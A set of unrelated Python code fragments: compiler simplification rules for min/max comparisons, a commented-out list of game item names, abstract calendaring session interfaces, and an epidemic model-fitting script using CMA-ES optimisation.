('iand', ('inot', ('iand', ('ieq', b , 0), c)), ('ilt', a, 0))),
# These patterns can result when (a < b || a < c) => (a < min(b, c))
# transformations occur before constant propagation and loop-unrolling.
(('~flt', a, ('fmax', b, a)), ('flt', a, b)),
(('~flt', ('fmin', a, b), a), ('flt', b, a)),
(('~fge', a, ('fmin', b, a)), True),
(('~fge', ('fmax', a, b), a), True),
(('~flt', a, ('fmin', b, a)), False),
(('~flt', ('fmax', a, b), a), False),
(('~fge', a, ('fmax', b, a)), ('fge', a, b)),
(('~fge', ('fmin', a, b), a), ('fge', b, a)),
(('ilt', a, ('imax', b, a)), ('ilt', a, b)),
(('ilt', ('imin', a, b), a), ('ilt', b, a)),
(('ige', a, ('imin', b, a)), True),
(('ige', ('imax', a, b), a), True),
(('ult', a, ('umax', b, a)), ('ult', a, b)),
(('ult', ('umin', a, b), a), ('ult', b, a)),
(('uge', a, ('umin', b, a)), True),
(('uge', ('umax', a, b), a), True),
(('ilt', a, ('imin', b, a)), False),
(('ilt', ('imax', a, b), a), False),
(('ige', a, ('imax', b, a)), ('ige', a, b)),
(('ige', ('imin', a, b), a), ('ige', b, a)),
(('ult', a, ('umin', b, a)), False),
(('ult', ('umax', a, b), a), False),
(('uge', a, ('umax', b, a)), ('uge', a, b)),
(('uge', ('umin', a, b), a), ('uge', b, a)),
(('ult', | |
# "Marble Table": "",
# "Granite Table": "",
# "Meteorite Work Bench": "",
# "Marble Work Bench": "",
# "Granite Work Bench": "",
# "Meteorite Bathtub": "",
# "Marble Bathtub": "",
# "Granite Bathtub": "",
# "Meteorite Bed": "",
# "Marble Bed": "",
# "Granite Bed": "",
# "Meteorite Bookcase": "",
# "Marble Bookcase": "",
# "Granite Bookcase": "",
# "Meteorite Candelabra": "",
# "Marble Candelabra": "",
# "Granite Candelabra": "",
# "Meteorite Candle": "",
# "Marble Candle": "",
# "Granite Candle": "",
# "Meteorite Chair": "",
# "Marble Chair": "",
# "Granite Chair": "",
# "Meteorite Chandelier": "",
# "Marble Chandelier": "",
# "Granite Chandelier": "",
# "Meteorite Chest": "",
# "Marble Chest": "",
# "Magic Water Dropper": "",
# "Golden Bug Net": "",
# "Magic Lava Dropper": "",
# "Magic Honey Dropper": "",
# "Empty Dropper": "",
# "Gladiator Helmet": "",
# "Gladiator Breastplate": "",
# "Gladiator Leggings": "",
# "Reflective Dye": "",
# "Enchanted Nightcrawler": "",
# "Grubby": "",
# "Sluggy": "",
# "Buggy": "",
# "Grub Soup": "",
# "Bomb Fish": "",
# "Frost Daggerfish": "",
# "Sharpening Station": "",
# "Ice Mirror": "",
# "Sailfish Boots": "",
# "Tsunami in a Bottle": "",
# "Target Dummy": "",
# "Corrupt Crate": "",
# "Crimson Crate": "",
# "Dungeon Crate": "",
# "Sky Crate": "",
# "Hallowed Crate": "",
# "Jungle Crate": "",
# "Crystal Serpent": "",
# "Toxikarp": "",
# "Bladetongue": "",
# "Shark Tooth Necklace": "",
# "Money Trough": "",
# "Bubble": "",
# "Daybloom Planter Box": "",
# "Moonglow Planter Box": "",
# "Deathweed Planter Box": "",
# "Blinkroot Planter Box": "",
# "Waterleaf Planter Box": "",
# "Shiverthorn Planter Box": "",
# "Fireblossom Planter Box": "",
# "Brain of Confusion": "",
# "Worm Scarf": "",
# "Balloon Pufferfish": "",
# "Lazure's Valkyrie Circlet: "","
# "Lazure's Valkyrie Cloak": "",
# "Lazure's Barrier Platform": "",
# "Golden Cross Grave Marker: "","
# "Golden Tombstone": "",
# "Golden Grave Marker": "",
# "Golden Gravestone": "",
# "Golden Headstone": "",
# "Crystal Block": "",
# "Music Box (Martian Madnes)": "",
# "Music Box (Pirate Invasion)": "",
# "Music Box (Hell)": "",
# "Crystal Block Wall": "",
# "Trap Door": "",
# "Tall Gate": "",
# "Sharkron Balloon": "",
# "Tax Collector's Hat": "",
# "Tax Collector's Suit": "",
# "Tax Collector's Pants": "",
# "Bone Glove": "",
# "Clothier's Jacket": "",
# "Clothier's Pants": "",
# "Dye Trader's Turban": "",
# "Deadly Sphere Staff": "",
# "Green Horseshoe Balloon": "",
# "Amber Horseshoe Balloon": "",
# "Pink Horseshoe Balloon": "",
# "Lava Lamp": "",
# "Enchanted Nightcrawler Cage": "",
# "Buggy Cage": "",
# "Grubby Cage": "",
# "Sluggy Cage": "",
# "Slap Hand": "",
# "Twilight Hair Dye": "",
# "Blessed Apple": "",
# "Spectre Bar": "",
# "Code 1": "",
# "Buccaneer Bandana": "",
# "Buccaneer Tunic": "",
# "Buccaneer Pantaloons": "",
# "Obsidian Outlaw Hat": "",
# "Obsidian Longcoat": "",
# "Obsidian Pants": "",
# "Medusa Head": "",
# "Item Frame": "",
# "Sandstone Block": "",
# "Hardened Sand Block": "",
# "Sandstone Wall": "",
# "Hardened Ebonsand Block": "",
# "Hardened Crimsand Block": "",
# "Ebonsandstone Block": "",
# "Crimsandstone Block": "",
# "Wooden Yoyo": "",
# "Malaise": "",
# "Artery": "",
# "Amazon": "",
# "Cascade": "",
# "Chik": "",
# "Code 2": "",
# "Rally": "",
# "Yelets": "",
# "Red's Throw": "",
# "Valkyrie Yoyo": "",
# "Amarok": "",
# "Hel-Fire": "",
# "Kraken": "",
# "The Eye of Cthulhu": "",
# "Red String": "",
# "Orange String": "",
# "Yellow String": "",
# "Lime String": "",
# "Green String": "",
# "Teal String": "",
# "Cyan String": "",
# "Sky Blue String": "",
# "Blue String": "",
# "Purple String": "",
# "Violet String": "",
# "Pink String": "",
# "Brown String": "",
# "White String": "",
# "Rainbow String": "",
# "Black String": "",
# "Black Counterweight": "",
# "Blue Counterweight": "",
# "Green Counterweight": "",
# "Purple Counterweight": "",
# "Red Counterweight": "",
# "Yellow Counterweight": "",
# "Format C": "",
# "Gradient": "",
# "Valor": "",
# "Hive Pack": "",
# "Yoyo Glove": "",
# "Demon Heart": "",
# "Spore Sac": "",
# "Shiny Stone": "",
# "Hardened Pearlsand Block": "",
# "Pearlsandstone Block": "",
# "Hardened Sand Wall": "",
# "Hardened Ebonsand Wall": "",
# "Hardened Crimsand Wall": "",
# "Hardened Pearlsand Wall": "",
# "Ebonsandstone Wall": "",
# "Crimsandstone Wall": "",
# "Pearlsandstone Wall": "",
# "Desert Fossil": "",
# "Desert Fossil Wall": "",
# "Exotic Scimitar": "",
# "Paintball Gun": "",
# "Classy Cane": "",
# "Stylish Scissors": "",
# "Mechanical Cart": "",
# "Mechanical Wheel Piece": "",
# "Mechanical Wagon Piece": "",
# "Mechanical Battery Piece": "",
# "Ancient Cultist Trophy": "",
# "Martian Saucer Trophy": "",
# "Flying Dutchman Trophy": "",
# "Living Mahogany Wand": "",
# "Rich Mahogany Leaf Wand": "",
# "Fallen Tuxedo Shirt": "",
# "Fallen Tuxedo Pants": "",
# "Fireplace": "",
# "Chimney": "",
# "Yoyo Bag": "",
# "Shrimpy Truffle": "",
# "Arkhalis": "",
# "<NAME>": "",
# "Music Box (The Towers)": "",
# "Music Box (Goblin Invasion)": "",
# "Ancient Cultist Mask": "",
# "Moon Lord Mask": "",
# "Fossil Helmet": "",
# "Fossil Plate": "",
# "Fossil Greaves": "",
# "Amber Staff": "",
# "Bone Javelin": "",
# "Bone Throwing Knife": "",
# "Sturdy Fossil": "",
# "Stardust Helmet": "",
# "Stardust Plate": "",
# "Stardust Leggings": "",
# "Portal Gun": "",
# "Terrarian": "",
# "Goblin Summoner Banner": "",
# "Salamander Banner": "",
# "Giant Shelly Banner": "",
# "Crawdad Banner": "",
# "Fritz Banner": "",
# "Creature from the Deep Banner": "",
# "Dr. Man Fly Banner": "",
# "Mothron Banner": "",
# "Severed Hand Banner": "",
# "The Possessed Banner": "",
# "Butcher Banner": "",
# "Psycho Banner": "",
# "Deadly Sphere Banner": "",
# "Nailhead Banner": "",
# "Poisonous Spore Banner": "",
# "Medusa Banner": "",
# "Hoplite Banner": "",
# "Granite Elemental Banner": "",
# "Grolem Banner": "",
# "Blood Zombie Banner": "",
# "Drippler Banner": "",
# "Tomb Crawler Banner": "",
# "Dune Splicer Banner": "",
# "Antlion Swarmer Banner": "",
# "Antlion Charger Banner": "",
# "Ghoul Banner": "",
# "Lamia Banner": "",
# "Desert Spirit Banner": "",
# "Basilisk Banner": "",
# "Ravager Scorpion Banner": "",
# "Stargazer Banner": "",
# "Milkyway Weaver Banner": "",
# "Flow Invader Banner": "",
# "Twinkle Popper Banner": "",
# "Small Star Cell Banner": "",
# "Star Cell Banner": "",
# "Corite Banner": "",
# "Sroller Banner": "",
# "Crawltipede Banner": "",
# "Drakomire Rider Banner": "",
# "Drakomire Banner": "",
# "Selenian Banner": "",
# "Predictor Banner": "",
# "Brain Suckler Banner": "",
# "Nebula Floater Banner": "",
# "Evolution Beast Banner": "",
# "Alien Larva Banner": "",
# "Alien Queen Banner": "",
# "Alien Hornet Banner": "",
# "Vortexian Banner": "",
# "Storm Diver Banner": "",
# "Pirate Captain Banner": "",
# "Pirate Deadeye Banner": "",
# "Pirate Corsair Banner": "",
# "Pirate Crossbower Banner": "",
# "Martian Walker Banner": "",
# "Red Devil Banner": "",
# "Pink Jellyfish Banner": "",
# "Green Jellyfish Banner": "",
# "Dark Mummy Banner": "",
# "Light Mummy Banner": "",
# "Angry Bones Banner": "",
# "Ice Tortoise Banner": "",
# "Damage Booster": "",
# "Life Booster": "",
# "Mana Booster": "",
# "Vortex Fragment": "",
# "Nebula Fragment": "",
# "Solar Fragment": "",
# "Stardust Fragment": "",
# "Luminite": "",
# "Luminite Brick": "",
# "Stardust Axe": "",
# "Stardust Chainsaw": "",
# "Stardust Drill": "",
# "Stardust Hammer": "",
# "Stardust Pickaxe": "",
# "Luminite Bar": "",
# "Solar Wings": "",
# "Vortex Booster": "",
# "Nebula Mantle": "",
| |
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method is must be implemented.*
"""
return # osid.calendaring.OffsetEventList
@abc.abstractmethod
def get_offset_events(self):
"""Gets all ``OffsetEvents``.
:return: an ``OffsetEventList``
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
offset_events = property(fget=get_offset_events)
class OffsetEventQuerySession:
"""This session provides methods for searching ``OffsetEvent`` objects.
The search query is constructed using the ``OffsetEventQuery``. The
offset event record ``Type`` also specifies the record for the
offset event query.
This session defines views that offer differing behaviors for
searching.
* federated calendar view: searches include offset events in
calendars of which this calendar is an ancestor in the calendar
hierarchy
* isolated calendar view: searches are restricted to offset events
in this calendar
``OffsetEvents`` may have a query record indicated by their
respective record types. The query record is accessed via the
``OffsetEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_search_offset_events(self):
"""Tests if this user can perform ``OffsetEvents`` searches.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known all methods in this
session will result in a ``PermissionDenied``. This is intended
as a hint to an application that may opt not to offer search
operations to unauthorized users.
:return: ``false`` if search methods are not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return # boolean
@abc.abstractmethod
def use_federated_calendar_view(self):
"""Federates the view for methods in this session.
A federated view will include offset events in calendars which
are children of this calendar in the calendar hierarchy.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def use_isolated_calendar_view(self):
"""Isolates the view for methods in this session.
An isolated view restricts searches to this calendar only.
*compliance: mandatory -- This method is must be implemented.*
"""
pass
@abc.abstractmethod
def get_offset_event_query(self):
"""Gets an offset event query.
:return: the offset event query
:rtype: ``osid.calendaring.OffsetEventQuery``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventQuery
offset_event_query = property(fget=get_offset_event_query)
@abc.abstractmethod
def get_offset_events_by_query(self, offset_event_query):
"""Gets a list of ``OffsetEvents`` matching the given offset event query.
:param offset_event_query: the offset event query
:type offset_event_query: ``osid.calendaring.OffsetEventQuery``
:return: the returned ``OffsetEventList``
:rtype: ``osid.calendaring.OffsetEventList``
:raise: ``NullArgument`` -- ``offset_event_query`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
:raise: ``Unsupported`` -- ``offset_event_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventList
class OffsetEventSearchSession:
"""This session provides methods for searching ``OffsetEvent`` objects.
The search query is constructed using the ``OffsetEventQuery``. The
offset event record ``Type`` also specifies the record for the
offset event query.
``get_offset_events_by_query()`` is the basic search method and
returns a list of ``OffsetEvents``. A more advanced search may be
performed with ``getOffsetEventsBySearch()``. It accepts an
``OffsetEventSearch`` in addition to the query for the purpose of
specifying additional options affecting the entire search, such as
ordering. ``get_offset_events_by_search()`` returns an
``OffsetEventSearchResults`` that can be used to access the
resulting ``OffsetEventList`` or be used to perform a search within
the result set through ``OffsetEventSearch``.
This session defines views that offer differing behaviors for
searching.
* federated calendar view: searches include offset events in
calendars of which this calendar is a ancestor in the calendar
hierarchy
* isolated calendar view: searches are restricted to offset events
in this calendar
Offset events may have a query record indicated by their respective
record types. The query record is accessed via the
``OffsetEventQuery``.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_offset_event_search(self):
"""Gets an offset event search.
:return: the offset event search
:rtype: ``osid.calendaring.OffsetEventSearch``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearch
offset_event_search = property(fget=get_offset_event_search)
@abc.abstractmethod
def get_offset_event_search_order(self):
"""Gets an offset event search order.
The ``OffsetEventSearchOrder`` is supplied to an
``OffsetEventSearch`` to specify the ordering of results.
:return: the offset event search order
:rtype: ``osid.calendaring.OffsetEventSearchOrder``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearchOrder
offset_event_search_order = property(fget=get_offset_event_search_order)
@abc.abstractmethod
def get_offset_events_by_search(self, offset_event_query, offset_event_search):
"""Gets the search results matching the given search query using the given search.
:param offset_event_query: the offset event search query
:type offset_event_query: ``osid.calendaring.OffsetEventQuery``
:param offset_event_search: the offset event search
:type offset_event_search: ``osid.calendaring.OffsetEventSearch``
:return: the returned search results
:rtype: ``osid.calendaring.OffsetEventSearchResults``
:raise: ``NullArgument`` -- ``offset_event_query`` or ``offset_event_search`` is ``null``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
:raise: ``Unsupported`` -- ``offset_event_query`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventSearchResults
@abc.abstractmethod
def get_offset_event_query_from_inspector(self, offset_event_query_inspector):
"""Gets an offset event query from an inspector.
The inspector is available from an ``OffsetEventSearchResults``.
:param offset_event_query_inspector: an offset event query inspector
:type offset_event_query_inspector: ``osid.calendaring.OffsetEventQueryInspector``
:return: the offset event query
:rtype: ``osid.calendaring.OffsetEventQuery``
:raise: ``NullArgument`` -- ``offset_event_query_inspector`` is ``null``
:raise: ``Unsupported`` -- ``offset_event_query_inspector`` is not of this service
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.OffsetEventQuery
class OffsetEventAdminSession:
"""This session creates, updates, and deletes ``Offset Events``.
The data for create and update is provided by the consumer via the
form object. ``OsidForms`` are requested for each create or update
and may not be reused.
Create and update operations differ in their usage. To create an
``OffsetEvent,`` an ``OffsetEventForm`` is requested using
``get_offset_event_form_for_create()`` specifying the desired record
``Types`` or none if no record ``Types`` are needed. The returned
``OffsetEventForm`` will indicate that it is to be used with a
create operation and can be used to examine metdata or validate data
prior to creation. Once the ``OffsetEventForm`` is submiited to a
create operation, it cannot be reused with another create operation
unless the first operation was unsuccessful. Each
``OffsetEventForm`` corresponds to an attempted transaction.
For updates, ``OffsetEventForms`` are requested to the
``OffsetEvent`` ``Id`` that is to be updated using
``getOffsetEventFormForUpdate()``. Similarly, the ``OffsetventForm``
has metadata about the data that can be updated and it can perform
validation before submitting the update. The ``OffsetEventForm`` can
only be used once for a successful update and cannot be reused.
The delete operations delete ``Offset Events``. To unmap an
``OffsetEvent`` from the current ``Calendar,`` the
``OffstEventCalendarAssignmentSession`` should be used. These delete
operations attempt to remove the ``OffsetEvent`` itself thus
removing it from all known ``Calendar`` catalogs.
This session includes an ``Id`` aliasing mechanism to assign an
external ``Id`` to an internally assigned Id.
"""
__metaclass__ = abc.ABCMeta
@abc.abstractmethod
def get_calendar_id(self):
"""Gets the ``Calendar`` ``Id`` associated with this session.
:return: the ``Calendar Id`` associated with this session
:rtype: ``osid.id.Id``
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.id.Id
calendar_id = property(fget=get_calendar_id)
@abc.abstractmethod
def get_calendar(self):
"""Gets the ``Calendar`` associated with this session.
:return: the ``Calendar`` associated with this session
:rtype: ``osid.calendaring.Calendar``
:raise: ``OperationFailed`` -- unable to complete request
:raise: ``PermissionDenied`` -- authorization failure
*compliance: mandatory -- This method must be implemented.*
"""
return # osid.calendaring.Calendar
calendar = property(fget=get_calendar)
@abc.abstractmethod
def can_create_offset_events(self):
"""Tests if this user can create ``OffsetEvents``.
A return of true does not guarantee successful authorization. A
return of false indicates that it is known creating an
``OffsetEvent`` will result in a ``PermissionDenied``. This is
intended as a hint to an application that may opt not to offer
create operations to an unauthorized user.
:return: ``false`` if ``OffsetEvent`` creation is not authorized, ``true`` otherwise
:rtype: ``boolean``
*compliance: mandatory -- This method must be implemented.*
"""
return | |
S_s, I_s, Inew_s, R_s, D_s = solve_SIR_difference_equations(p, p_dict_SIR, travel_data)
rho_SIR = p_dict_SIR.get('rho', p.rho)
Iinit_SIR = p_dict_SIR.get('Iinit1', p.Iinit1)
theta_fit_SIR = p_dict_SIR.get('theta',theta_SIR)
R_0_s = (rho_SIR * p.beta * 1) / theta_fit_SIR
R_eff_s = ((rho_SIR * p.beta * alpha_SIR) / theta_fit_SIR) * (S_s / p.N)
## Optimization for the SIR-deltaD model
print('SIR-DeltaD model fitting.')
# Optimize only rho and Iinit:
print('------- SIR-DeltaD: Fitting -----------')
# Define theta
p.beta = beta_SIR
p.DeltaD = DeltaD_SIR
p.theta = theta_SIR
parametersSIRDeltaD, scoresSIRDeltaD, stddevSIRDeltaD = [], [], []
for i in range(repeats):
print('SIR DeltaD' + Fitparams + ' fitting Repeat: ' + str(i + 1))
optsSIRDeltaD = cma.CMAOptions()
optsSIRDeltaD.set("bounds", bounds_SIRDeltaD)
optsSIRDeltaD.set("CMA_stds", stds_SIRDeltaD)
x0_SIRDeltaD = np.random.uniform(bounds_SIRDeltaD[0][0], bounds_SIRDeltaD[1][0])
for j in range(len(bounds_SIRDeltaD[0])-1):
x0_SIRDeltaD = np.append(x0_SIRDeltaD, np.random.uniform(bounds_SIRDeltaD[0][j+1], bounds_SIRDeltaD[1][j+1]))
print(x0_SIRDeltaD)
es = cma.fmin(NBlike_SIR, x0_SIRDeltaD, sigma0=1, args=(p, parameters_to_optimise_SIRDeltaD, data_D, travel_data), options = optsSIRDeltaD)
parametersSIRDeltaD.append(es[0])
scoresSIRDeltaD.append(es[1])
stddevSIRDeltaD.append(es[6])
# Sort according to smallest function score
#SIR
orderSIRDeltaD = np.argsort(scoresSIRDeltaD)
scoresSIRDeltaD = np.asarray(scoresSIRDeltaD)[orderSIRDeltaD]
parametersSIRDeltaD = np.asarray(parametersSIRDeltaD)[orderSIRDeltaD]
stddevSIRDeltaD = np.asarray(stddevSIRDeltaD)[orderSIRDeltaD]
# Extract best
obtained_parameters_SIRDeltaD = parametersSIRDeltaD[0]
obtained_stdev_SIRDeltaD = stddevSIRDeltaD[0]
# Store SIR resutls
print('Storing default fit SIR-DeltaD model best result...')
with open(filename_SIRDeltaD + '.txt', 'w') as f:
for x in obtained_parameters_SIRDeltaD:
f.write(pints.strfloat(x) + '\n')
print('Storing default fit all_SIR SIR model errors...')
with open(filename_SIRDeltaD + '-errors.txt', 'w') as f:
for score in scoresSIRDeltaD:
f.write(pints.strfloat(-score) + '\n')
# Store simulations for plotting
p_dict_SIRDeltaD = dict(zip(parameters_to_optimise_SIRDeltaD, obtained_parameters_SIRDeltaD))
# update params:
if p.square_lockdown:
alpha_SIRDeltaD = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SIRDeltaD)
alpha_SIRDeltaD = alpha_SIRDeltaD[:-p.extra_days_to_simulate]
else:
alpha_SIRDeltaD = np.ones(p.maxtime+1)
label_SIRDeltaD = ''
for l in p_dict_SIR:
label_SIRDeltaD = label_SIRDeltaD + str(l) + ': ' + str('%.4g' % p_dict_SIRDeltaD.get(l)) + '\n'
S_sD, I_sD, Inew_sD, R_sD, D_sD = solve_SIR_difference_equations(p, p_dict_SIRDeltaD, travel_data)
rho_SIRDeltaD = p_dict_SIRDeltaD.get('rho', p.rho)
Iinit_SIRDeltaD = p_dict_SIRDeltaD.get('Iinit1', p.Iinit1)
theta_fit_SIRDeltaD = p_dict_SIRDeltaD.get('theta',theta_SIR)
R_0_sD = (rho_SIRDeltaD * p.beta * 1) / theta_fit_SIRDeltaD
R_eff_sD = ((rho_SIRDeltaD * p.beta * alpha_SIRDeltaD) / theta_fit_SIRDeltaD) * (S_sD / p.N)
## Optimization for the SINR model
print('SIUR model fitting.')
# Optimize only rho and Iinit:
print('------- SIUR: Fitting rho and Iinit -----------')
# Define theta and xi
p.theta = theta_SINR
p.xi = xi_SINR
parametersSINR, scoresSINR, stddevSINR = [], [], []
for i in range(repeats):
print('SIUR' + Fitparams + ' fitting Repeat: ' + str(i + 1))
optsSINR = cma.CMAOptions()
optsSINR.set("bounds", bounds_SINR)
optsSINR.set("CMA_stds", stds_SINR)
x0_SINR = np.random.uniform(bounds_SINR[0][0], bounds_SINR[1][0])
for j in range(len(bounds_SINR[0])-1):
x0_SINR = np.append(x0_SINR, np.random.uniform(bounds_SINR[0][j+1], bounds_SINR[1][j+1]))
print(x0_SINR)
es = cma.fmin(NBlike_SINR, x0_SINR, sigma0=1, args=(p, parameters_to_optimise_SINR, data_D, travel_data), options=optsSINR)
parametersSINR.append(es[0])
scoresSINR.append(es[1])
stddevSINR.append(es[6])
# Sort according to smallest function score
#SIR
orderSINR = np.argsort(scoresSINR)
scoresSINR = np.asarray(scoresSINR)[orderSINR]
parametersSINR = np.asarray(parametersSINR)[orderSINR]
stddevSINR = np.asarray(stddevSINR)[orderSINR]
# Extract best
obtained_parameters_SINR = parametersSINR[0]
obtained_stdev_SINR = stddevSINR[0]
# Store SIR resutls
print('Storing default fit SINR model best result...')
with open(filename_SINR + '.txt', 'w') as f:
for x in obtained_parameters_SINR:
f.write(pints.strfloat(x) + '\n')
print('Storing default fit SINR model errors...')
with open(filename_SINR + '-errors.txt', 'w') as f:
for score in scoresSINR:
f.write(pints.strfloat(-score) + '\n')
# Simulations for plots:
p_dict_SINR = dict(zip(parameters_to_optimise_SINR, obtained_parameters_SINR))
label_SINR = ''
for l in p_dict_SINR:
label_SINR = label_SINR + str(l) + ': ' + str('%.4g' % p_dict_SINR.get(l)) + '\n'
S_u, I_u, Inew_u, N_u, R_u, D_u = solve_SIUR_difference_equations(p, p_dict_SINR, travel_data)
if p.square_lockdown:
alpha_SINR = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SINR)
else:
alpha_SINR = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
rho_SINR = p_dict_SINR.get('rho', p.rho)
Iinit_SINR = p_dict_SINR.get('Iinit1', p.Iinit1)
theta_fit_SINR = p_dict_SINR.get('theta',theta_SINR)
R_0_u = (rho_SINR * p.beta * 1) / theta_fit_SINR
R_eff_u = ((rho_SINR * p.beta * alpha_SINR[:-p.extra_days_to_simulate]) / theta_fit_SINR) * (S_u / p.N)
# If Age fit required:
if FitAge:
print('Fitting SItR model')
parameters_to_optimise = ['rho', 'Iinit1', 'negative_binomial_phi']
toy_values = [3, 1000, .001]
filename_AGE = os.path.join(folder_path, get_file_name_suffix(p, 'syntheticSItRD-'+str(SyntDataNum_file), Noise_flag+'-maxtime-' + str(maxtime_fit), parameters_to_optimise))
bounds_SItR = [[ rho_lower, Iinit1_lower, negative_binomial_phi_lower], [ rho_upper, Iinit1_upper, negative_binomial_phi_upper]]
stds_SItR = [1e-1, 100, 1e-2]
if FitStep:
parameters_to_optimise.extend(['lockdown_baseline', 'lockdown_offset'])
bounds_SItR[0].extend([lockdown_baseline_lower, lockdown_offset_lower])
bounds_SItR[1].extend([lockdown_baseline_upper, lockdown_offset_upper])
toy_values.extend([p.lockdown_baseline, p.lockdown_offset])
stds_SItR.extend([1e-2, 10])
print('Age model fitting using RMSE.')
# Set up optimisation
print('Selected data source: ' + 'simulatedAGE')
print('Storing results to: ' + filename_AGE + '.txt')
# Calculate beta, gamma and zeta vector rates.
print('Storing fixed parameters...')
store_rate_vectors(dict(zip(parameters_to_optimise, toy_values)),p)
## Optimization for the Age model
parameters, scores = [], []
# Repeat optimisation multiple times from different initial guesses and pick best
for i in range(min(repeats, 5)):
print('Age model fitting using RMSE. Repeat: ' + str(i + 1))
# CMA-ES (covariance matrix adaptation evolution strategy)
opts = cma.CMAOptions()
#opts.set("seed", 100)
opts.set("bounds", bounds_SItR)
opts.set("CMA_stds", stds_SItR)
x0 = np.random.uniform(bounds_SItR[0][0], bounds_SItR[1][0])
for j in range(len(bounds_SItR[0])-1):
x0 = np.append(x0, np.random.uniform(bounds_SItR[0][j+1], bounds_SItR[1][j+1]))
print(x0)
es = cma.fmin(NBlike_SItRD, x0, sigma0=1, args=(p, parameters_to_optimise, travel_data, data_D), options=opts)
parameters.append(es[0])
scores.append(es[1])
# Sort according to smallest function score
order = np.argsort(scores)
scores = np.asarray(scores)[order]
parameters = np.asarray(parameters)[order]
# Show results
print('Age model best parameters:')
print(parameters[0])
print('Age model best score:')
print(-scores[0])
# Extract best
obtained_parameters = parameters[0]
# Store results
print('Storing age modelbest result...')
with open(filename_AGE + travel_label + str(travel_data) + '.txt', 'w') as f:
for x in obtained_parameters:
f.write(pints.strfloat(x) + '\n')
print('Storing all age model errors...')
with open(filename_AGE + travel_label + str(travel_data) + '-errors.txt', 'w') as f:
for score in scores:
f.write(pints.strfloat(-score) + '\n')
# store simulations for plotting
p_dict_SItRD = dict(zip(parameters_to_optimise, obtained_parameters))
label_SItRD = ''
for l in p_dict_SItRD:
label_SItRD = label_SItRD + str(l) + ': ' + str('%.4g' % p_dict_SItRD.get(l)) + '\n'
store_rate_vectors(p_dict_SItRD,p)
S_a, Iday_a, R_a, D_a, Itot_a = solve_difference_equations(p, p_dict_SItRD, travel_data)
# R0 and Reff
if p.square_lockdown:
p.alpha = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SItRD)
else:
p.alpha = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
R_eff_a = calculate_R_instantaneous(p, S_a, p_dict_SItRD)
R_0_a = R_eff_a[0]
else:
Iday_a = data_I
Itot_a = data_Itot
S_a = data_S
S_a_long = data_S_long
D_a = data_Dreal
R_a = data_R
p_dict_SItRD = dict(zip(['rho', 'Iinit1','negative_binomial_phi'], [3.203,860,.002])) # Use the true parameters
store_rate_vectors(p_dict_SItRD,p)
if p.square_lockdown:
p.alpha = step(p, lgoog_data = p.maxtime + 1 - p.numeric_max_age, parameters_dictionary = p_dict_SItRD)
else:
p.alpha = np.ones(p.maxtime + 1 + p.extra_days_to_simulate)
print(len(p.Gjoint))
print(len(p.beta))
print(len(S_a))
R_eff_a = calculate_R_instantaneous(p, S_a_long, p_dict_SItRD)
R_0_a = R_eff_a[0]
## PLOTS for SIR and SINR
print('---- Summary ...')
# get the correct theta:
print('Data day of max new infections:')
print(np.argmax(data_I[0,:]))
print('------ Best SIR parameters:------ ')
print(parametersSIR[0])
print('Std Dev:')
print(stddevSIR[0])
print('Best SIR score:')
print(-scoresSIR[0])
print('Total deaths and recoveries:')
print([np.sum(D_s),np.sum(R_s)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_s,2),round(min(R_eff_s),2),round(max(R_eff_s),2), np.where(R_eff_s<1)[0][0], np.argmax(Inew_s[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
print('------ Best SIR-DeltaD parameters:------ ')
print(parametersSIRDeltaD[0])
print('Std Dev:')
print(stddevSIRDeltaD[0])
print('Best SIR score:')
print(-scoresSIRDeltaD[0])
print('Total deaths and recoveries:')
print([np.sum(D_sD),np.sum(R_sD)])
print('R_0, R_eff_min, R_eff_max, t where R_eff_a<1, t of Inew max ')
print([round(R_0_sD,2),round(min(R_eff_sD),2),round(max(R_eff_sD),2), np.where(R_eff_sD<1)[0][0], np.argmax(Inew_sD[: -(p.numeric_max_age + p.extra_days_to_simulate)])])
print('------ Best SINR parameters:------ ')
print(parametersSINR[0])
print('Std Dev:')
print(stddevSINR[0])
print('Best SINR score:')
print(-scoresSINR[0])
print('Day of max new infections:')
